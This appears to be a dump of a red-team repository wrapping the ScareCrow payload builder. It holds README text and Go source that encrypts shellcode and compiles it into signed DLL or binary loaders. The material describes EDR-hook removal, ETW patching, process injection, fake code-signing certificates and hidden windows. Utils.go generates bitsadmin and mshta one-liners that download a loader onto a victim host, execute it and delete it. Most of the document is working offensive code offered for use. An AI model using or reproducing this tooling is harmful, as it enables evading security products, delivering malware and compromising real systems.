115 | -unmodified 116 | When enabled will generate a DLL loader that WILL NOT remove the EDR hooks in system DLLs and only use custom syscalls (set to false by default) 117 | -url string 118 | URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/) 119 | -valid string 120 | The path to a valid code signing cert. Used instead of -domain if a valid code signing cert is desired. 121 | ``` 122 | ## Loader 123 | The Loader determines the technique used to load the shellcode into the target system. If no Loader option is chosen, ScareCrow will just compile a standard DLL file that can be used by rundll32, regsvr32, or other techniques that utilize a DLL. ScareCrow utilizes the following loader types to load shellcode into memory: 124 | * Control Panel – This generates a control panel applet (i.e. Program and Features, or AutoPlay). By compiling the loader to have specific DLL export functions in combination with the file extension .cpl, it will spawn a control panel process (rundll32.exe) and the loader will be loaded into memory. 125 | * WScript – Spawns a WScript process that utilizes a manifest file and registration-free COM techniques to load (not inject) the DLL loader into its own process, side-by-side. This avoids registering the DLL in memory, as the manifest file tells the process which DLL to load, where it is, and what version to use. 126 | * Excel – Generates an XLL file, an Excel-based DLL, that when loaded into Excel will execute the loader. A hidden Excel process will be spawned, forcing the XLL file to be loaded. 127 | * Msiexec - Spawns a hidden MSIExec process that will load the DLL into memory and execute the shellcode. 128 | 129 | 130 | ScareCrow can also generate binary based payloads if needed by using the `-Loader` command line option. These binaries do not benefit from any side-by-side loading techniques but serve as an additional technique to execute shellcode depending on the situation. 
131 | 132 | 133 | ## Console 134 | ScareCrow utilizes a technique to first create the process and then move it into the background. This does two things: first, it helps keep the process hidden, and second, it avoids being detected by any EDR product. Spawning a process right away in the background can be very suspicious and an indicator of maliciousness. ScareCrow does this by calling the ‘GetConsoleWindow’ and ‘ShowWindow’ Windows functions after the process is created and the EDR’s hooks are loaded, and then changes the window's attributes to hidden. ScareCrow utilizes these APIs rather than using the traditional ` -ldflags -H=windowsgui` as this is highly signatured and classified in most security products as an Indicator of Compromise. 135 | 136 | If the `-console` command-line option is selected, ScareCrow will not hide the process in the background. Instead, ScareCrow will add several debug messages displaying what the loader is doing. 137 | 138 | ## Process Injection 139 | ScareCrow contains the ability to do process injection attacks. To avoid any hooking or detection in either the loader process or the injected process itself, ScareCrow first unhooks the loader process as it would normally, to ensure there are no hooks in the process. Once completed, the loader will then spawn the process specified in the creation command. Once spawned, the loader will then create a handle to the process to retrieve a list of loaded DLLs. Once it finds DLLs, it will enumerate the base address of each DLL in the remote process. Using the function WriteProcessMemory, the loader will then write the bytes of the system DLLs stored on disk (since they are “clean” of EDR hooks) without the need to change the memory permissions first. 
ScareCrow uses WriteProcessMemory because this function contains a feature primarily used in debugging where, even if a section of memory is read-only, if everything is correct in the call to WriteProcessMemory, it will temporarily change the permission to read-write, update the memory section and then restore the original permissions. Once this is done, the loader can inject shellcode into the spawned process with no issue, as there are no EDR hooks in either process. 140 | 141 | This option can be used with any of the loader options. To enable process injection, use the `-injection` command-line option along with the full path to the process you want to inject into. When putting the path in as an argument, it is important to either surround the full path with `""` or use double `\` for each directory in the path. 142 | 143 | 144 | ## ETW Bypass 145 | ScareCrow contains the ability to patch ETW functions, preventing any event from being generated by the process. ETW utilizes built-in Syscalls to generate this telemetry. Since ETW is a native feature built into Windows, security products do not need to "hook" the ETW syscalls to gain the information. As a result, to prevent ETW, ScareCrow patches numerous ETW syscalls, flushing out the registers and returning the execution flow to the next instruction. Use the `-etw` command-line option to enable this in your loader. 146 | 147 | 148 | ## Delivery 149 | The `-delivery` command line argument allows you to generate a command or string of code (in the macro case) to remotely pull the file from a remote source to the victim’s host. These delivery methods include: 150 | * Bits – This will generate a bitsadmin command that will download the loader remotely, execute it and remove it. This delivery command is compatible with Binary, Control, Excel and Wscript loaders. 151 | * HTA – This will generate a blank HTA file containing the loader. This option will also provide a command line that will execute the HTA remotely. 
This delivery command is compatible with Control and Excel loaders. 152 | * Macro – This will generate an Office macro that can be put into an Excel or Word macro document. When this macro is executed, the loader will be downloaded from a remote source and executed, and then removed. This delivery command is compatible with Control, Excel and Wscript loaders. 153 | 154 | ## Custom Attribute Files 155 | While ScareCrow has an extensive list of file attributes, there are some circumstances where a custom (maybe environment-specific) set of attributes is required. To accommodate this, ScareCrow accepts a JSON file containing attributes. Using the `-configfile` command-line option, ScareCrow will use these attributes and filename instead of the pre-existing ones in ScareCrow. The file `main.json` contains a sample template of the JSON structure required for this to work properly. Note that whatever you use as the "InternalName" will be the file name. 156 | 157 | 158 | ## To Do 159 | * Currently only supports x64 payloads 160 | * Some older versions of Windows OSes (e.g. 
Windows 7 or Windows 8.1), have issues reloading the systems DLLs, as a result a version check is built in to ensure stability 161 | 162 | ## Credit 163 | * Special thanks to josephspurrier for his [repo](https://github.com/josephspurrier/goversioninfo) 164 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/ScareCrow.go: --------------------------------------------------------------------------------
package main

import (
	"ScareCrow/Cryptor"
	"ScareCrow/Loader"
	"ScareCrow/limelighter"
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/base64"
	"encoding/hex"
	"flag"
	"fmt"
	"io/ioutil"
	"log"
	"os/exec"
)

// FlagOptions holds the parsed command-line options for one run of the
// builder. Field names do not always match the flag names; the flag each
// field comes from is noted beside it (see options()).
type FlagOptions struct {
	outFile          string // -O: output loader filename; not used by the dll/binary loaders
	inputFile        string // -I: path to the raw 64-bit shellcode file
	URL              string // -url: base URL used when a delivery command is generated
	LoaderType       string // -Loader: binary, control, dll, excel, msiexec or wscript
	CommandLoader    string // -delivery: bits, hta or macro
	domain           string // -domain: domain used to create the fake code signing cert
	password         string // -password: password for the code signing cert
	valid            string // -valid: path to a valid code signing cert
	configfile       string // -configfile: JSON file with custom file attributes
	ProcessInjection string // -injection: path of the process to create/inject into
	ETW              bool   // -etw
	console          bool   // -console
	refresher        bool   // -unmodified (flag name differs from the field name)
	sandbox          bool   // -sandbox
}

// options declares the command-line flags, parses os.Args and returns the
// values as a FlagOptions. flag.Parse terminates the process itself on an
// unknown flag or -h, so no error is returned here.
func options() *FlagOptions {
	outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.")
	inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.")
	console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.")
	LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process using a JScript loader.
[*] msiexec - Loads into MSIexec process using a JScript loader.
[*] wscript - Loads into WScript process using a JScript loader.
`)
	refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)")
	URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)")
	CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).
[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders).
[*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)`)
	domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. www.acme.com) ")
	password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.")
	ETW := flag.Bool("etw", false, "Enables ETW patching to prevent ETW events from being generated")
	ProcessInjection := flag.String("injection", "", "Enables Process Injection Mode and specify the path to the process to create/inject into (use \\ for the path).")
	configfile := flag.String("configfile", "", "The path to a json based configuration file to generate custom file attributes. This will not use the the default ones.")
	valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.")
	sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`)
	flag.Parse()
	return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, configfile: *configfile, console: *console, ETW: *ETW, ProcessInjection: *ProcessInjection, refresher: *refresher, valid: *valid, sandbox: *sandbox}
}

// execute cross-compiles the generated Go project in the current directory
// for windows/amd64 and hands the artifact to limelighter.Signer.
//
// opt supplies the loader type, the optional attribute file and the signing
// options; name is the base name returned by Loader.CompileFile. The
// returned value is the (possibly changed) base name; the artifact on disk is
// name+".exe" for the "binary" loader and name+".dll" (built with
// -buildmode=c-shared through the mingw toolchain) for every other type.
//
// Error handling is best-effort throughout: the error from exec.LookPath is
// discarded, a failed mv only prints "error", and a failed go build prints
// the compiler output but still reports "[+] Payload Compiled" and calls
// Signer on a file that may not exist.
func execute(opt *FlagOptions, name string) string {
	bin, _ := exec.LookPath("env")
	var compiledname string
	var cmd *exec.Cmd
	if opt.configfile != "" {
		// FileProperties may return a different name when a custom attribute
		// file is supplied, so ../oldname is renamed to ../name to match.
		oldname := name
		name = limelighter.FileProperties(name, opt.configfile)
		cmd = exec.Command("mv", "../"+oldname+"", "../"+name+"")
		err := cmd.Run()
		if err != nil {
			fmt.Printf("error")
		}
	} else {
		name = limelighter.FileProperties(name, opt.configfile)
	}
	if opt.LoaderType == "binary" {
		cmd = exec.Command(bin, "GOROOT_FINAL=/dev/null", "GOOS=windows", "GOARCH=amd64", "go", "build", "-a", "-trimpath", "-ldflags", "-s -w", "-o", ""+name+".exe")
	} else {
		// All non-binary loaders are built as a c-shared DLL, which requires
		// cgo and the x86_64-w64-mingw32 cross compilers listed in the README.
		cmd = exec.Command(bin, "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "go", "build", "-a", "-trimpath", "-ldflags", "-w -s", "-o", ""+name+".dll", "-buildmode=c-shared")
	}
	fmt.Println("[*] Compiling Payload")
	var out bytes.Buffer
	var stderr bytes.Buffer
	cmd.Stdout = &out
	cmd.Stderr = &stderr
	err := cmd.Run()
	if err != nil {
		// Build failure is reported but does not stop the run.
		fmt.Printf("%s: %s\n", err, stderr.String())
	}
	if opt.LoaderType == "binary" {
		compiledname = name + ".exe"
	} else {
		compiledname = name + ".dll"
	}
	fmt.Println("[+] Payload Compiled")
	limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname)
	return name
}

// main prints the banner, parses and cross-validates the flags, reads the
// shellcode file, hex- then base64-encodes it, PKCS#7-pads the result and
// encrypts it with AES-CBC under a random key and IV from Cryptor, then
// hands the base64 ciphertext/key/IV to Loader.CompileFile, compiles and
// signs via execute, and finally calls Loader.CompileLoader.
//
// Every validation failure is fatal (log.Fatal). Note that -domain is
// required even when -valid is supplied, and that the ioutil.ReadFile error
// is discarded, so an unreadable -I path is processed as empty input.
func main() {
	fmt.Println(`
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
`)
	opt := options()

	if opt.inputFile == "" {
		log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)")
	}

	if opt.CommandLoader != "" && opt.URL == "" {
		log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command")
	}

	if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "msiexec" && opt.LoaderType != "wscript" {
		log.Fatal("Error: Invalid loader, please select one of the allowed loader types")
	}

	if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" {
		log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types")
	}

	if opt.CommandLoader == "hta" && opt.outFile == "" {
		log.Fatal("Error: Please provide the a HTA filename to store the loader in")
	}

	if (opt.CommandLoader == "hta" || opt.CommandLoader == "macro") && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
		log.Fatal("Error: Binary and DLL loaders are not compatable with this delivery command")
	}

	if opt.outFile != "" && (opt.LoaderType == "binary" || opt.LoaderType == "dll") {
		// Warning only: -O is silently ignored for these loader types.
		fmt.Println("[!] -O not needed. This loader type uses the name of the file they are spoofing")
	}

	if opt.LoaderType == "binary" && opt.refresher == true {
		log.Fatal("Error: Can not use the unmodified option with a binary loader")
	}

	if opt.console == true && opt.LoaderType != "binary" {
		log.Fatal("Error: Console mode is only for binary based payloads")
	}

	if opt.domain == "" {
		log.Fatal("Error: Please provide a domain in order to generate a code signing certificate")
	}

	if opt.password == "" && opt.valid != "" {
		log.Fatal("Error: Please provide a password for the valid code signing certificate")
	}

	if opt.ProcessInjection != "" && opt.ETW == true {
		log.Fatal("Error: Currently process injection and ETW bypass is not available together yet. Please try only one of these options")
	}

	var rawbyte []byte
	// Read error is ignored; src is empty on failure.
	src, _ := ioutil.ReadFile(opt.inputFile)
	// The plaintext handed to AES is base64(hex(shellcode)), not the raw bytes.
	dst := make([]byte, hex.EncodedLen(len(src)))
	hex.Encode(dst, src)
	r := base64.StdEncoding.EncodeToString(dst)
	rawbyte = []byte(r)
	// RandomBuffer is a project helper; the sizes suggest a 32-byte key
	// (AES-256) and a 16-byte IV (one AES block) — TODO confirm in Cryptor.
	key := Cryptor.RandomBuffer(32)
	iv := Cryptor.RandomBuffer(16)

	block, err := aes.NewCipher(key)
	if err != nil {
		log.Fatal(err)
	}
	paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize)
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println("[*] Encrypting Shellcode Using AES Encryption")
	cipherText := make([]byte, len(paddedInput))
	ciphermode := cipher.NewCBCEncrypter(block, iv)
	ciphermode.CryptBlocks(cipherText, paddedInput)
	b64ciphertext := base64.StdEncoding.EncodeToString(cipherText)
	b64key := base64.StdEncoding.EncodeToString(key)
	b64iv := base64.StdEncoding.EncodeToString(iv)
	fmt.Println("[+] Shellcode Encrypted")
	name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox, opt.ETW, opt.ProcessInjection)
	name = execute(opt, name)
	Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox)

}
-------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/File_Attributes.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png: 
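-------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/PreRefreshed_Dlls.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/Refreshed_Dlls.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/kyleavery/scarecrow_wrapper/7e94b03f50ad3f0539e9b7055b7da74637d0a299/Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Screenshots/ScareCrow.png -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/Utils/Utils.go: --------------------------------------------------------------------------------
package Utils

import (
	"ScareCrow/Cryptor"
	"archive/zip"
	"encoding/base64"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"

	"github.com/fatih/color"
)

// base64string is an embedded base64 blob that B64decode writes to disk.
// Its contents were stripped from this listing.
const base64string = "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"

// Writefile writes result to outFile, creating it (mode 0644) if needed and
// replacing any previous contents. Errors go through check and so panic.
func Writefile(outFile string, result string) {
	// O_TRUNC is required: without it a result shorter than an existing
	// file would leave the old tail in place after the new bytes.
	cf, err := os.OpenFile(outFile, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644)
	check(err)
	defer cf.Close()
	_, err = cf.Write([]byte(result))
	check(err)
}

// check panics on a non-nil error; this is the package's error convention.
func check(e error) {
	if e != nil {
		panic(e)
	}
}

// B64ripper renders B64string as a sequence of string-concatenation
// statements that rebuild it in a variable named B64Varible, splitting it
// into chunks whose length is chosen once per call by
// Cryptor.GenerateNumer(400, 850). With implant set the statements use Go
// syntax (`var X string` / `X = X + "..."`); otherwise a semicolon-terminated
// script form (`var X="";` / `X = X + "...";`) is produced. The generated
// lines are returned joined into one string.
func B64ripper(B64string string, B64Varible string, implant bool) string {
	var B64payload []string
	MAX_LENGTH := Cryptor.GenerateNumer(400, 850)
	x := 0
	B64length := len(B64string)
	if implant == true {
		B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+" string\n"))
		for x < B64length {
			if x+MAX_LENGTH <= B64length {
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+MAX_LENGTH]))

				x += MAX_LENGTH
			} else {
				// Last, shorter chunk.
				finalLength := B64length - x
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\"\n", B64string[0+x:x+finalLength]))
				x += finalLength
			}
		}
	} else {
		B64payload = append(B64payload, fmt.Sprintf("var "+B64Varible+"=\"\";\n"))
		for x < B64length {
			if x+MAX_LENGTH <= B64length {
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+MAX_LENGTH]))

				x += MAX_LENGTH
			} else {
				finalLength := B64length - x
				B64payload = append(B64payload, fmt.Sprintf(" "+B64Varible+" = "+B64Varible+" + \"%s\";\n", B64string[0+x:x+finalLength]))
				x += finalLength
			}
		}

	}
	finalstring := strings.Join(B64payload, "")
	return finalstring
}

// Unzip extracts the archive at src into dest and returns the paths it
// created. Entries whose joined path would fall outside dest are rejected
// with an "illegal file path" error (zip-slip guard). Files are created with
// the entry's mode and truncated if present. On any error the paths
// processed so far are returned together with the error.
func Unzip(src string, dest string) ([]string, error) {
	var filenames []string
	r, err := zip.OpenReader(src)
	if err != nil {
		return filenames, err
	}
	defer r.Close()
	for _, f := range r.File {
		fpath := filepath.Join(dest, f.Name)
		// Join cleans the path, so ".." segments are resolved before the check.
		if !strings.HasPrefix(fpath, filepath.Clean(dest)+string(os.PathSeparator)) {
			return filenames, fmt.Errorf("%s: illegal file path", fpath)
		}
		filenames = append(filenames, fpath)
		if f.FileInfo().IsDir() {
			// Report a failed directory creation instead of ignoring it.
			if err = os.MkdirAll(fpath, os.ModePerm); err != nil {
				return filenames, err
			}
			continue
		}
		if err = os.MkdirAll(filepath.Dir(fpath), os.ModePerm); err != nil {
			return filenames, err
		}
		outFile, err := os.OpenFile(fpath, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, f.Mode())
		if err != nil {
			return filenames, err
		}
		rc, err := f.Open()
		if err != nil {
			// Do not leak the output handle when the entry cannot be opened.
			outFile.Close()
			return filenames, err
		}
		_, err = io.Copy(outFile, rc)
		outFile.Close()
		rc.Close()

		if err != nil {
			return filenames, err
		}
	}
	return filenames, nil
}

// B64decode decodes the embedded base64string and writes the bytes to a new
// file called name, syncing it to disk before returning. Every failure panics.
func B64decode(name string) {
	dec, err := base64.StdEncoding.DecodeString(base64string)
	if err != nil {
		panic(err)
	}
	f, err := os.Create(name)
	if err != nil {
		panic(err)
	}
	defer f.Close()
	if _, err := f.Write(dec); err != nil {
		panic(err)
	}
	if err := f.Sync(); err != nil {
		panic(err)
	}
}

// Zipit writes a deflate-compressed zip archive of source (a file or a
// directory tree) to target. When source is a directory its entries are
// stored under the directory's base name; a single file keeps the name from
// its FileInfo. The first error from os.Create, os.Stat or the walk is
// returned; errors from closing the archive and file are not reported.
func Zipit(source, target string) error {
	zipfile, err := os.Create(target)
	if err != nil {
		return err
	}
	defer zipfile.Close()
	archive := zip.NewWriter(zipfile)
	defer archive.Close()
	info, err := os.Stat(source)
	if err != nil {
		// Surface a missing source rather than silently writing an empty archive.
		return err
	}
	var baseDir string
	if info.IsDir() {
		baseDir = filepath.Base(source)
	}
	// The walk's error is the function's result; a failed entry is otherwise invisible.
	return filepath.Walk(source, func(path string, info os.FileInfo, err error) error {
		if err != nil {
			return err
		}
		header, err := zip.FileInfoHeader(info)
		if err != nil {
			return err
		}
		if baseDir != "" {
			header.Name = filepath.Join(baseDir, strings.TrimPrefix(path, source))
		}
		if info.IsDir() {
			header.Name += "/"
		} else {
			header.Method = zip.Deflate
		}
		writer, err := archive.CreateHeader(header)
		if err != nil {
			return err
		}
		if info.IsDir() {
			return nil
		}
		file, err := os.Open(path)
		if err != nil {
			return err
		}
		defer file.Close()
		_, err = io.Copy(writer, file)
		return err

	})
}

// Command prints the usage instructions that match the selected delivery
// option and returns URL, which is given a trailing "/" in the "macro" case
// when it lacked one. The branches are selected by URL, CommandLoader and
// the extension of outFile; note that the extension tests use
// strings.Contains rather than a suffix check, so they match anywhere in the
// name. Nothing is written to disk here.
func Command(URL string, CommandLoader string, outFile string) string {

	if URL != "" && CommandLoader == "hta" {
		fmt.Println("[*] HTA Payload")
		fmt.Println("[!] Can be executed manually by a user or embeded into a one liner command that executes it:")
		if strings.HasSuffix(URL, "/") {
			fmt.Println("mshta.exe " + URL + outFile)
		} else {
			fmt.Println("mshta.exe " + URL + "/" + outFile)
		}
	}
	if URL == "" && !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") {
		fmt.Println(color.GreenString("[+] ") + "Non Executable file extension detected. Either add the extension \".js\" or use the following to execute it (note that this works from a local instance, webdav or fileshare... not a webserver):")
		fmt.Println("cscript //E:jscript " + outFile + "")
	}
	if URL != "" && CommandLoader == "macro" {
		if strings.HasSuffix(URL, "/") {
		} else {
			URL = URL + "/"
		}
		fmt.Println("[*] Macro Delivery Payload")
		fmt.Println("[!] Excel macro that will download, execute and remove the payload:")
	}

	if URL != "" && CommandLoader == "bits" {
		fmt.Println("[*] Bitsadmin")
		fmt.Println("[!] One liner command to execute it:")
		if !strings.Contains(outFile, ".js") && !strings.Contains(outFile, ".hta") && !strings.Contains(outFile, ".cpl") && !strings.Contains(outFile, ".exe") {
			if strings.HasSuffix(URL, "/") {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
			} else {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & cscript //E: JScript %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
			}
		} else {
			if strings.HasSuffix(URL, "/") {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")
			} else {
				fmt.Println("bitsadmin /transfer " + outFile + " " + URL + "/" + outFile + " %APPDATA%\\" + outFile + " & %APPDATA%\\" + outFile + " & timeout 20 & del %APPDATA%\\" + outFile + "")

			}
		}
	}
	return URL
}
-------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.mod: -------------------------------------------------------------------------------- 1 | module ScareCrow 2 | 3 | go 1.14 4 | 5 | require ( 6 | github.com/akavel/rsrc v0.9.0 // indirect 7 | github.com/fatih/color v1.9.0 8 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca 9 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 // indirect 10 | golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c 11 | ) 12 | -------------------------------------------------------------------------------- /Payload_Type/scarecrow_wrapper/agent_code/ScareCrow/go.sum: -------------------------------------------------------------------------------- 1 | github.com/akavel/rsrc 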
v0.9.0 h1:HwUDC0+tMFWqN4D5G+o5siGD4oVsC3jn6zM8ocjc3nY= 2 | github.com/akavel/rsrc v0.9.0/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c= 3 | github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s= 4 | github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU= 5 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE= 6 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca h1:ozPUX9TKQZVek4lZWYRsQo7uS8vJ+q4OOHvRhHiCLfU= 7 | github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca/go.mod h1:eJTEwMjXb7kZ633hO3Ln9mBUCOjX2+FlTljvpl9SYdE= 8 | github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo= 9 | github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ= 10 | github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI= 11 | github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA= 12 | github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE= 13 | github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s= 14 | github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGeM= 15 | github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE= 16 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 h1:+n/aFZefKZp7spd8DFdX7uMikMLXX4oubIzJF4kv/wI= 17 | github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3/go.mod h1:RagcQ7I8IeTMnF8JTXieKnO4Z6JCsikNEzj0DwauVzE= 18 | github.com/rogpeppe/go-internal v1.7.1-0.20210131190821-dc4b49510d96/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc= 19 | github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74= 20 | github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae h1:LLvf5CCPekfeUlqQDGfVvds1kMf4hBfcAkpzYHqjYV4= 21 | 
